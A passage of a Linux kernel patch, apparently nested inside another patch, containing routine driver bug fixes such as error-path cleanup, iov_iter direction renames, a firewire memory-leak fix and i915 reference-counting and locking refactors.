+index 3aa91aed3bf73..226e87b85116e 100644
+--- a/drivers/bus/sunxi-rsb.c
++++ b/drivers/bus/sunxi-rsb.c
+@@ -857,7 +857,13 @@ static int __init sunxi_rsb_init(void)
+ 		return ret;
+ 	}
+ 
+-	return platform_driver_register(&sunxi_rsb_driver);
++	ret = platform_driver_register(&sunxi_rsb_driver);
++	if (ret) {
++		bus_unregister(&sunxi_rsb_bus);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(sunxi_rsb_init);
+ 
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index f5868dddbb618..5d1c8e1c99b5b 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -1329,7 +1329,7 @@ SYSCALL_DEFINE3(getrandom, char __user *, ubuf, size_t, len, unsigned int, flags
+ 			return ret;
+ 	}
+ 
+-	ret = import_single_range(READ, ubuf, len, &iov, &iter);
++	ret = import_single_range(ITER_DEST, ubuf, len, &iov, &iter);
+ 	if (unlikely(ret))
+ 		return ret;
+ 	return get_random_bytes_user(&iter);
+@@ -1447,7 +1447,7 @@ static long random_ioctl(struct file *f, unsigned int cmd, unsigned long arg)
+ 			return -EINVAL;
+ 		if (get_user(len, p++))
+ 			return -EFAULT;
+-		ret = import_single_range(WRITE, p, len, &iov, &iter);
++		ret = import_single_range(ITER_SOURCE, p, len, &iov, &iter);
+ 		if (unlikely(ret))
+ 			return ret;
+ 		ret = write_pool_user(&iter);
+diff --git a/drivers/dma-buf/dma-fence.c b/drivers/dma-buf/dma-fence.c
+index 406b4e26f538f..0de0482cd36e2 100644
+--- a/drivers/dma-buf/dma-fence.c
++++ b/drivers/dma-buf/dma-fence.c
+@@ -167,7 +167,7 @@ struct dma_fence *dma_fence_allocate_private_stub(void)
+ 		       0, 0);
+ 
+ 	set_bit(DMA_FENCE_FLAG_ENABLE_SIGNAL_BIT,
+-		&dma_fence_stub.flags);
++		&fence->flags);
+ 
+ 	dma_fence_signal(fence);
+ 
+diff --git a/drivers/firewire/core-cdev.c b/drivers/firewire/core-cdev.c
+index 9c89f7d53e99d..958aa4662ccb0 100644
+--- a/drivers/firewire/core-cdev.c
++++ b/drivers/firewire/core-cdev.c
+@@ -819,8 +819,10 @@ static int ioctl_send_response(struct client *client, union ioctl_arg *arg)
+ 
+ 	r = container_of(resource, struct inbound_transaction_resource,
+ 			 resource);
+-	if (is_fcp_request(r->request))
++	if (is_fcp_request(r->request)) {
++		kfree(r->data);
+ 		goto out;
++	}
+ 
+ 	if (a->length != fw_get_response_length(r->request)) {
+ 		ret = -EINVAL;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index 033aac6be7daa..b43e5e6ddaf6e 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -984,6 +984,8 @@ int __ref efi_mem_reserve_persistent(phys_addr_t addr, u64 size)
+ 	/* first try to find a slot in an existing linked list entry */
+ 	for (prsv = efi_memreserve_root->next; prsv; ) {
+ 		rsv = memremap(prsv, sizeof(*rsv), MEMREMAP_WB);
++		if (!rsv)
++			return -ENOMEM;
+ 		index = atomic_fetch_add_unless(&rsv->count, 1, rsv->size);
+ 		if (index < rsv->size) {
+ 			rsv->entry[index].base = addr;
+diff --git a/drivers/firmware/efi/memattr.c b/drivers/firmware/efi/memattr.c
+index 0a9aba5f9ceff..f178b2984dfb2 100644
+--- a/drivers/firmware/efi/memattr.c
++++ b/drivers/firmware/efi/memattr.c
+@@ -33,7 +33,7 @@ int __init efi_memattr_init(void)
+ 		return -ENOMEM;
+ 	}
+ 
+-	if (tbl->version > 1) {
++	if (tbl->version > 2) {
+ 		pr_warn("Unexpected EFI Memory Attributes table version %d\n",
+ 			tbl->version);
+ 		goto unmap;
+diff --git a/drivers/fpga/intel-m10-bmc-sec-update.c b/drivers/fpga/intel-m10-bmc-sec-update.c
+index 79d48852825ef..03f1bd81c434d 100644
+--- a/drivers/fpga/intel-m10-bmc-sec-update.c
++++ b/drivers/fpga/intel-m10-bmc-sec-update.c
+@@ -574,20 +574,27 @@ static int m10bmc_sec_probe(struct platform_device *pdev)
+ 	len = scnprintf(buf, SEC_UPDATE_LEN_MAX, "secure-update%d",
+ 			sec->fw_name_id);
+ 	sec->fw_name = kmemdup_nul(buf, len, GFP_KERNEL);
+-	if (!sec->fw_name)
+-		return -ENOMEM;
++	if (!sec->fw_name) {
++		ret = -ENOMEM;
++		goto fw_name_fail;
++	}
+ 
+ 	fwl = firmware_upload_register(THIS_MODULE, sec->dev, sec->fw_name,
+ 				       &m10bmc_ops, sec);
+ 	if (IS_ERR(fwl)) {
+ 		dev_err(sec->dev, "Firmware Upload driver failed to start\n");
+-		kfree(sec->fw_name);
+-		xa_erase(&fw_upload_xa, sec->fw_name_id);
+-		return PTR_ERR(fwl);
++		ret = PTR_ERR(fwl);
++		goto fw_uploader_fail;
+ 	}
+ 
+ 	sec->fwl = fwl;
+ 	return 0;
++
++fw_uploader_fail:
++	kfree(sec->fw_name);
++fw_name_fail:
++	xa_erase(&fw_upload_xa, sec->fw_name_id);
++	return ret;
+ }
+ 
+ static int m10bmc_sec_remove(struct platform_device *pdev)
+diff --git a/drivers/fpga/stratix10-soc.c b/drivers/fpga/stratix10-soc.c
+index 357cea58ec98e..f7f01982a5126 100644
+--- a/drivers/fpga/stratix10-soc.c
++++ b/drivers/fpga/stratix10-soc.c
+@@ -213,9 +213,9 @@ static int s10_ops_write_init(struct fpga_manager *mgr,
+ 	/* Allocate buffers from the service layer's pool. */
+ 	for (i = 0; i < NUM_SVC_BUFS; i++) {
+ 		kbuf = stratix10_svc_allocate_memory(priv->chan, SVC_BUF_SIZE);
+-		if (!kbuf) {
++		if (IS_ERR(kbuf)) {
+ 			s10_free_buffers(mgr);
+-			ret = -ENOMEM;
++			ret = PTR_ERR(kbuf);
+ 			goto init_done;
+ 		}
+ 
+diff --git a/drivers/fsi/fsi-sbefifo.c b/drivers/fsi/fsi-sbefifo.c
+index 5f93a53846aad..9912b7a6a4b9a 100644
+--- a/drivers/fsi/fsi-sbefifo.c
++++ b/drivers/fsi/fsi-sbefifo.c
+@@ -659,7 +659,7 @@ static void sbefifo_collect_async_ffdc(struct sbefifo *sbefifo)
+ 	}
+         ffdc_iov.iov_base = ffdc;
+ 	ffdc_iov.iov_len = SBEFIFO_MAX_FFDC_SIZE;
+-        iov_iter_kvec(&ffdc_iter, WRITE, &ffdc_iov, 1, SBEFIFO_MAX_FFDC_SIZE);
++        iov_iter_kvec(&ffdc_iter, ITER_DEST, &ffdc_iov, 1, SBEFIFO_MAX_FFDC_SIZE);
+ 	cmd[0] = cpu_to_be32(2);
+ 	cmd[1] = cpu_to_be32(SBEFIFO_CMD_GET_SBE_FFDC);
+ 	rc = sbefifo_do_command(sbefifo, cmd, 2, &ffdc_iter);
+@@ -756,7 +756,7 @@ int sbefifo_submit(struct device *dev, const __be32 *command, size_t cmd_len,
+ 	rbytes = (*resp_len) * sizeof(__be32);
+ 	resp_iov.iov_base = response;
+ 	resp_iov.iov_len = rbytes;
+-        iov_iter_kvec(&resp_iter, WRITE, &resp_iov, 1, rbytes);
++        iov_iter_kvec(&resp_iter, ITER_DEST, &resp_iov, 1, rbytes);
+ 
+ 	/* Perform the command */
+ 	rc = mutex_lock_interruptible(&sbefifo->lock);
+@@ -839,7 +839,7 @@ static ssize_t sbefifo_user_read(struct file *file, char __user *buf,
+ 	/* Prepare iov iterator */
+ 	resp_iov.iov_base = buf;
+ 	resp_iov.iov_len = len;
+-	iov_iter_init(&resp_iter, WRITE, &resp_iov, 1, len);
++	iov_iter_init(&resp_iter, ITER_DEST, &resp_iov, 1, len);
+ 
+ 	/* Perform the command */
+ 	rc = mutex_lock_interruptible(&sbefifo->lock);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 3bf4f2edc1089..90e739d9aeee7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -790,8 +790,8 @@ static void gfx_v11_0_read_wave_data(struct amdgpu_device *adev, uint32_t simd,
+ 	 * zero here */
+ 	WARN_ON(simd != 0);
+ 
+-	/* type 2 wave data */
+-	dst[(*no_fields)++] = 2;
++	/* type 3 wave data */
++	dst[(*no_fields)++] = 3;
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_STATUS);
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_PC_LO);
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_PC_HI);
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+index 15eb3658d70e6..09fdcd20cb919 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+@@ -337,7 +337,13 @@ const struct nbio_hdp_flush_reg nbio_v4_3_hdp_flush_reg = {
+ 
+ static void nbio_v4_3_init_registers(struct amdgpu_device *adev)
+ {
+-	return;
++	if (adev->ip_versions[NBIO_HWIP][0] == IP_VERSION(4, 3, 0)) {
++		uint32_t data;
++
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2);
++		data &= ~RCC_DEV0_EPF2_STRAP2__STRAP_NO_SOFT_RESET_DEV0_F2_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2, data);
++	}
+ }
+ 
+ static u32 nbio_v4_3_get_rom_offset(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 85bd1f18259c7..b425ec00817c4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -8784,6 +8784,13 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		if (!dm_old_crtc_state->stream)
+ 			goto skip_modeset;
+ 
++		/* Unset freesync video if it was active before */
++		if (dm_old_crtc_state->freesync_config.state == VRR_STATE_ACTIVE_FIXED) {
++			dm_new_crtc_state->freesync_config.state = VRR_STATE_INACTIVE;
++			dm_new_crtc_state->freesync_config.fixed_refresh_in_uhz = 0;
++		}
++
++		/* Now check if we should set freesync video mode */
+ 		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 2875f6bc3a6a2..ed36088ebcfde 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1498,6 +1498,20 @@ static int smu_disable_dpms(struct smu_context *smu)
+ 		}
+ 	}
+ 
++	/*
++	 * For SMU 13.0.4/11, PMFW will handle the features disablement properly
++	 * for gpu reset case. Driver involvement is unnecessary.
++	 */
++	if (amdgpu_in_reset(adev)) {
++		switch (adev->ip_versions[MP1_HWIP][0]) {
++		case IP_VERSION(13, 0, 4):
++		case IP_VERSION(13, 0, 11):
++			return 0;
++		default:
++			break;
++		}
++	}
++
+ 	/*
+ 	 * For gpu reset, runpm and hibernation through BACO,
+ 	 * BACO feature has to be kept enabled.
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index ed05070b73072..92925f0f72396 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -1323,7 +1323,7 @@ static const struct intel_cdclk_vals adlp_cdclk_table[] = {
+ 	{ .refclk = 24000, .cdclk = 192000, .divider = 2, .ratio = 16 },
+ 	{ .refclk = 24000, .cdclk = 312000, .divider = 2, .ratio = 26 },
+ 	{ .refclk = 24000, .cdclk = 552000, .divider = 2, .ratio = 46 },
+-	{ .refclk = 24400, .cdclk = 648000, .divider = 2, .ratio = 54 },
++	{ .refclk = 24000, .cdclk = 648000, .divider = 2, .ratio = 54 },
+ 
+ 	{ .refclk = 38400, .cdclk = 179200, .divider = 3, .ratio = 14 },
+ 	{ .refclk = 38400, .cdclk = 192000, .divider = 2, .ratio = 10 },
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 2353723ca1bd2..598028870124d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -1861,11 +1861,19 @@ static int get_ppgtt(struct drm_i915_file_private *file_priv,
+ 	vm = ctx->vm;
+ 	GEM_BUG_ON(!vm);
+ 
++	/*
++	 * Get a reference for the allocated handle.  Once the handle is
++	 * visible in the vm_xa table, userspace could try to close it
++	 * from under our feet, so we need to hold the extra reference
++	 * first.
++	 */
++	i915_vm_get(vm);
++
+ 	err = xa_alloc(&file_priv->vm_xa, &id, vm, xa_limit_32b, GFP_KERNEL);
+-	if (err)
++	if (err) {
++		i915_vm_put(vm);
+ 		return err;
+-
+-	i915_vm_get(vm);
++	}
+ 
+ 	GEM_BUG_ON(id == 0); /* reserved for invalid/unassigned ppgtt */
+ 	args->value = id;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_tiling.c b/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
+index fd42b89b7162b..bc21b1c2350a7 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
+@@ -305,10 +305,6 @@ i915_gem_object_set_tiling(struct drm_i915_gem_object *obj,
+ 	spin_unlock(&obj->vma.lock);
+ 
+ 	obj->tiling_and_stride = tiling | stride;
+-	i915_gem_object_unlock(obj);
+-
+-	/* Force the fence to be reacquired for GTT access */
+-	i915_gem_object_release_mmap_gtt(obj);
+ 
+ 	/* Try to preallocate memory required to save swizzling on put-pages */
+ 	if (i915_gem_object_needs_bit17_swizzle(obj)) {
+@@ -321,6 +317,11 @@ i915_gem_object_set_tiling(struct drm_i915_gem_object *obj,
+ 		obj->bit_17 = NULL;
+ 	}
+ 
++	i915_gem_object_unlock(obj);
++
++	/* Force the fence to be reacquired for GTT access */
++	i915_gem_object_release_mmap_gtt(obj);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_context.c b/drivers/gpu/drm/i915/gt/intel_context.c
+index e94365b08f1ef..2aa63ec521b89 100644
+--- a/drivers/gpu/drm/i915/gt/intel_context.c
++++ b/drivers/gpu/drm/i915/gt/intel_context.c
+@@ -528,7 +528,7 @@ retry:
+ 	return rq;
+ }
+ 
+-struct i915_request *intel_context_find_active_request(struct intel_context *ce)
++struct i915_request *intel_context_get_active_request(struct intel_context *ce)
+ {
+ 	struct intel_context *parent = intel_context_to_parent(ce);
+ 	struct i915_request *rq, *active = NULL;
+@@ -552,6 +552,8 @@ struct i915_request *intel_context_find_active_request(struct intel_context *ce)
+ 
+ 		active = rq;
+ 	}
++	if (active)
++		active = i915_request_get_rcu(active);
+ 	spin_unlock_irqrestore(&parent->guc_state.lock, flags);
+ 
+ 	return active;
+diff --git a/drivers/gpu/drm/i915/gt/intel_context.h b/drivers/gpu/drm/i915/gt/intel_context.h
+index be09fb2e883a5..4ab6c8ddd6ecc 100644
+--- a/drivers/gpu/drm/i915/gt/intel_context.h
++++ b/drivers/gpu/drm/i915/gt/intel_context.h
+@@ -268,8 +268,7 @@ int intel_context_prepare_remote_request(struct intel_context *ce,
+ 
+ struct i915_request *intel_context_create_request(struct intel_context *ce);
+ 
+-struct i915_request *
+-intel_context_find_active_request(struct intel_context *ce);
++struct i915_request *intel_context_get_active_request(struct intel_context *ce);
+ 
+ static inline bool intel_context_is_barrier(const struct intel_context *ce)
+ {
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine.h b/drivers/gpu/drm/i915/gt/intel_engine.h
+index cbc8b857d5f7a..7a4504ea35c36 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine.h
+@@ -248,8 +248,8 @@ void intel_engine_dump_active_requests(struct list_head *requests,
+ ktime_t intel_engine_get_busy_time(struct intel_engine_cs *engine,
+ 				   ktime_t *now);
+ 
+-struct i915_request *
+-intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine);
++void intel_engine_get_hung_entity(struct intel_engine_cs *engine,
++				  struct intel_context **ce, struct i915_request **rq);
+ 
+ u32 intel_engine_context_size(struct intel_gt *gt, u8 class);
+ struct intel_context *
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index fcbccd8d244e9..b458547e1fc6e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -2078,17 +2078,6 @@ static void print_request_ring(struct drm_printer *m, struct i915_request *rq)
+ 	}
+ }
+ 
+-static unsigned long list_count(struct list_head *list)
+-{
+-	struct list_head *pos;
+-	unsigned long count = 0;
+-
+-	list_for_each(pos, list)
+-		count++;
+-
+-	return count;
+-}
+-
+ static unsigned long read_ul(void *p, size_t x)
+ {
+ 	return *(unsigned long *)(p + x);
+@@ -2180,11 +2169,11 @@ void intel_engine_dump_active_requests(struct list_head *requests,
+ 	}
+ }
+ 
+-static void engine_dump_active_requests(struct intel_engine_cs *engine, struct drm_printer *m)
++static void engine_dump_active_requests(struct intel_engine_cs *engine,
++					struct drm_printer *m)
+ {
++	struct intel_context *hung_ce = NULL;
+ 	struct i915_request *hung_rq = NULL;
+-	struct intel_context *ce;
+-	bool guc;
+ 
+ 	/*
+ 	 * No need for an engine->irq_seqno_barrier() before the seqno reads.
+@@ -2193,27 +2182,22 @@ static void engine_dump_active_requests(struct intel_engine_cs *engine, struct d
+ 	 * But the intention here is just to report an instantaneous snapshot
+ 	 * so that's fine.
+ 	 */
+-	lockdep_assert_held(&engine->sched_engine->lock);
++	intel_engine_get_hung_entity(engine, &hung_ce, &hung_rq);
+ 
+ 	drm_printf(m, "\tRequests:\n");
+ 
+-	guc = intel_uc_uses_guc_submission(&engine->gt->uc);
+-	if (guc) {
+-		ce = intel_engine_get_hung_context(engine);
+-		if (ce)
+-			hung_rq = intel_context_find_active_request(ce);
+-	} else {
+-		hung_rq = intel_engine_execlist_find_hung_request(engine);
+-	}
+-
+ 	if (hung_rq)
+ 		engine_dump_request(hung_rq, m, "\t\thung");
++	else if (hung_ce)
++		drm_printf(m, "\t\tGot hung ce but no hung rq!\n");
+ 
+-	if (guc)
++	if (intel_uc_uses_guc_submission(&engine->gt->uc))
+ 		intel_guc_dump_active_requests(engine, hung_rq, m);
+ 	else
+-		intel_engine_dump_active_requests(&engine->sched_engine->requests,
+-						  hung_rq, m);
++		intel_execlists_dump_active_requests(engine, hung_rq, m);
++
++	if (hung_rq)
++		i915_request_put(hung_rq);
+ }
+ 
+ void intel_engine_dump(struct intel_engine_cs *engine,
+@@ -2223,7 +2207,6 @@ void intel_engine_dump(struct intel_engine_cs *engine,
+ 	struct i915_gpu_error * const error = &engine->i915->gpu_error;
+ 	struct i915_request *rq;
+ 	intel_wakeref_t wakeref;
+-	unsigned long flags;
+ 	ktime_t dummy;
+ 
+ 	if (header) {
+@@ -2260,13 +2243,8 @@ void intel_engine_dump(struct intel_engine_cs *engine,
+ 		   i915_reset_count(error));
+ 	print_properties(engine, m);
+ 
+-	spin_lock_irqsave(&engine->sched_engine->lock, flags);
+ 	engine_dump_active_requests(engine, m);
+ 
+-	drm_printf(m, "\tOn hold?: %lu\n",
+-		   list_count(&engine->sched_engine->hold));
+-	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
+-
+ 	drm_printf(m, "\tMMIO base:  0x%08x\n", engine->mmio_base);
+ 	wakeref = intel_runtime_pm_get_if_in_use(engine->uncore->rpm);
+ 	if (wakeref) {
+@@ -2312,8 +2290,7 @@ intel_engine_create_virtual(struct intel_engine_cs **siblings,
+ 	return siblings[0]->cops->create_virtual(siblings, count, flags);
+ }
+ 
+-struct i915_request *
+-intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine)
++static struct i915_request *engine_execlist_find_hung_request(struct intel_engine_cs *engine)
+ {
+ 	struct i915_request *request, *active = NULL;
+ 
+@@ -2365,6 +2342,33 @@ intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine)
+ 	return active;
+ }
+ 
++void intel_engine_get_hung_entity(struct intel_engine_cs *engine,
++				  struct intel_context **ce, struct i915_request **rq)
++{
++	unsigned long flags;
++
++	*ce = intel_engine_get_hung_context(engine);
++	if (*ce) {
++		intel_engine_clear_hung_context(engine);
++
++		*rq = intel_context_get_active_request(*ce);
++		return;
++	}
++
++	/*
++	 * Getting here with GuC enabled means it is a forced error capture
++	 * with no actual hang. So, no need to attempt the execlist search.
++	 */
++	if (intel_uc_uses_guc_submission(&engine->gt->uc))
++		return;
++
++	spin_lock_irqsave(&engine->sched_engine->lock, flags);
++	*rq = engine_execlist_find_hung_request(engine);
++	if (*rq)
++		*rq = i915_request_get_rcu(*rq);
++	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
++}
++
+ void xehp_enable_ccs_engines(struct intel_engine_cs *engine)
+ {
+ 	/*
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index c718e6dc40b51..bfd1ffc71a489 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -4144,6 +4144,33 @@ void intel_execlists_show_requests(struct intel_engine_cs *engine,
+ 	spin_unlock_irqrestore(&sched_engine->lock, flags);
+ }
+ 
++static unsigned long list_count(struct list_head *list)
++{
++	struct list_head *pos;
++	unsigned long count = 0;
++
++	list_for_each(pos, list)
++		count++;
++
++	return count;
++}
++
++void intel_execlists_dump_active_requests(struct intel_engine_cs *engine,
++					  struct i915_request *hung_rq,
++					  struct drm_printer *m)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&engine->sched_engine->lock, flags);
++
++	intel_engine_dump_active_requests(&engine->sched_engine->requests, hung_rq, m);
++
++	drm_printf(m, "\tOn hold?: %lu\n",
++		   list_count(&engine->sched_engine->hold));
++
++	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
++}
++
+ #if IS_ENABLED(CONFIG_DRM_I915_SELFTEST)
+ #include "selftest_execlists.c"
+ #endif
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.h b/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
+index a1aa92c983a51..d2c7d45ea0623 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
+@@ -32,6 +32,10 @@ void intel_execlists_show_requests(struct intel_engine_cs *engine,
+ 							int indent),
+ 				   unsigned int max);
+ 
++void intel_execlists_dump_active_requests(struct intel_engine_cs *engine,
++					  struct i915_request *hung_rq,
++					  struct drm_printer *m);
++
+ bool
+ intel_engine_in_execlists_submission_mode(const struct intel_engine_cs *engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 1a23e901cc663..0ec07dad1dcf1 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -1685,7 +1685,7 @@ static void __guc_reset_context(struct intel_context *ce, intel_engine_mask_t st
+ 			goto next_context;
+ 
+ 		guilty = false;
+-		rq = intel_context_find_active_request(ce);
++		rq = intel_context_get_active_request(ce);
+ 		if (!rq) {
+ 			head = ce->ring->tail;
+ 			goto out_replay;
+@@ -1698,6 +1698,7 @@ static void __guc_reset_context(struct intel_context *ce, intel_engine_mask_t st
+ 		head = intel_ring_wrap(ce->ring, rq->head);
+ 
+ 		__i915_request_reset(rq, guilty);
++		i915_request_put(rq);
+ out_replay:
+ 		guc_reset_state(ce, head, guilty);
+ next_context:
+@@ -4587,6 +4588,8 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 
+ 	xa_lock_irqsave(&guc->context_lookup, flags);
+ 	xa_for_each(&guc->context_lookup, index, ce) {
++		bool found;
++
+ 		if (!kref_get_unless_zero(&ce->ref))
+ 			continue;
+ 
+@@ -4603,10 +4606,18 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 				goto next;
+ 		}
+ 
++		found = false;
++		spin_lock(&ce->guc_state.lock);
+ 		list_for_each_entry(rq, &ce->guc_state.requests, sched.link) {
+ 			if (i915_test_request_state(rq) != I915_REQUEST_ACTIVE)
+ 				continue;
+ 
++			found = true;
++			break;
++		}
++		spin_unlock(&ce->guc_state.lock);
++
++		if (found) {
+ 			intel_engine_set_hung_context(engine, ce);
+ 
+ 			/* Can only cope with one hang at a time... */
+@@ -4614,6 +4625,7 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 			xa_lock(&guc->context_lookup);
+ 			goto done;
+ 		}
++
+ next:
+ 		intel_context_put(ce);
+ 		xa_lock(&guc->context_lookup);
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.c b/drivers/gpu/drm/i915/i915_gpu_error.c
+index 9ea2fe34e7d30..847b9e6af1a1d 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.c
++++ b/drivers/gpu/drm/i915/i915_gpu_error.c
+@@ -1592,43 +1592,20 @@ capture_engine(struct intel_engine_cs *engine,
+ {
+ 	struct intel_engine_capture_vma *capture = NULL;
+ 	struct intel_engine_coredump *ee;
+-	struct intel_context *ce;
++	struct intel_context *ce = NULL;
+ 	struct i915_request *rq = NULL;
+-	unsigned long flags;
+ 
+ 	ee = intel_engine_coredump_alloc(engine, ALLOW_FAIL, dump_flags);
+ 	if (!ee)
+ 		return NULL;
+ 
+-	ce = intel_engine_get_hung_context(engine);
+-	if (ce) {
+-		intel_engine_clear_hung_context(engine);
+-		rq = intel_context_find_active_request(ce);
+-		if (!rq || !i915_request_started(rq))
+-			goto no_request_capture;
+-	} else {
+-		/*
+-		 * Getting here with GuC enabled means it is a forced error capture
+-		 * with no actual hang. So, no need to attempt the execlist search.
+-		 */
+-		if (!intel_uc_uses_guc_submission(&engine->gt->uc)) {
+-			spin_lock_irqsave(&engine->sched_engine->lock, flags);
+-			rq = intel_engine_execlist_find_hung_request(engine);
+-			spin_unlock_irqrestore(&engine->sched_engine->lock,
+-					       flags);
+-		}
+-	}
+-	if (rq)
+-		rq = i915_request_get_rcu(rq);
+-
+-	if (!rq)
++	intel_engine_get_hung_entity(engine, &ce, &rq);
++	if (!rq || !i915_request_started(rq))
+ 		goto no_request_capture;
+ 
+ 	capture = intel_engine_coredump_add_request(ee, rq, ATOMIC_MAYFAIL);
+-	if (!capture) {
+-		i915_request_put(rq);
++	if (!capture)
+ 		goto no_request_capture;
+-	}
+ 	if (dump_flags & CORE_DUMP_FLAG_IS_GUC_CAPTURE)
+ 		intel_guc_capture_get_matching_node(engine->gt, ee, ce);
+ 
+@@ -1638,6 +1615,8 @@ capture_engine(struct intel_engine_cs *engine,
+ 	return ee;
+ 
+ no_request_capture:
++	if (rq)
++		i915_request_put(rq);
+ 	kfree(ee);
+ 	return NULL;
+ }
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index 857a2f0420d77..c924f1124ebca 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -1193,14 +1193,11 @@ static int boe_panel_enter_sleep_mode(struct boe_panel *boe)
+ 	return 0;
+ }
+ 
+-static int boe_panel_unprepare(struct drm_panel *panel)
++static int boe_panel_disable(struct drm_panel *panel)
+ {
+ 	struct boe_panel *boe = to_boe_panel(panel);
+ 	int ret;
+ 
+-	if (!boe->prepared)
+-		return 0;
+-
+ 	ret = boe_panel_enter_sleep_mode(boe);
+ 	if (ret < 0) {
+ 		dev_err(panel->dev, "failed to set panel off: %d\n", ret);
+@@ -1209,6 +1206,16 @@ static int boe_panel_unprepare(struct drm_panel *panel)
+ 
+ 	msleep(150);
+ 
++	return 0;
++}
++
++static int boe_panel_unprepare(struct drm_panel *panel)
++{
++	struct boe_panel *boe = to_boe_panel(panel);
++
++	if (!boe->prepared)
++		return 0;
++
+ 	if (boe->desc->discharge_on_disable) {
+ 		regulator_disable(boe->avee);
+ 		regulator_disable(boe->avdd);
+@@ -1528,6 +1535,7 @@ static enum drm_panel_orientation boe_panel_get_orientation(struct drm_panel *pa
+ }
+ 
+ static const struct drm_panel_funcs boe_panel_funcs = {
++	.disable = boe_panel_disable,
+ 	.unprepare = boe_panel_unprepare,
+ 	.prepare = boe_panel_prepare,
+ 	.enable = boe_panel_enable,
+diff --git a/drivers/gpu/drm/solomon/ssd130x.c b/drivers/gpu/drm/solomon/ssd130x.c
+index bc41a5ae810af..4bb3a247732dc 100644
+--- a/drivers/gpu/drm/solomon/ssd130x.c
